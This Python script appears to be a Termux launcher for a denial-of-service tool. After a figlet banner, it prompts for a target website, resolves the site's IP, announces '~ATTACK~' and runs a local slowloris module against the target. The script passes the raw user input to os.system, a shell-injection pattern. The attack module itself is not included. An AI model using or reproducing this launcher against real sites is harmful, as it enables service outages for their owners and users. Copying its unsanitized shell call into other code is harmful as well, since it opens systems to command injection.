import sys
import os
import time
import random
import socket
import getpass
os.system("clear")
print(" \x1b[1;92m " )
time.sleep(1)
os.system("pkg install figlet")
print (" ")
print( " ")
print( " ")
os.system("clear")
print(" \x1b[1;92m " )
os.system(" figlet -c -f slant Shikharsingh")
print ("                                                                  by Dank Shiku")
print(" ")
print (" ")
print (" ")
print( " ")
target = input(" Target (ex: www.example.com) : ")
os.system("clear")
print (" ")
print (" ")
os.system(" figlet  -c -f slant Shikharsingh")
print ("                                                                  by Dank Shiku")
print(" ")
print(" ")
print (" ")
print(" ")
print ("                           ------------------------------------")
print(f'                          | Target IP address : {socket.gethostbyname(target)} |')
print ("                           ------------------------------------")
print (" ")
print (" ")
print (" ")
print (" ")
print ("                                         ~ATTACK~         ")
print (" ")
os.system("python module/slowloris.py "+target+"")

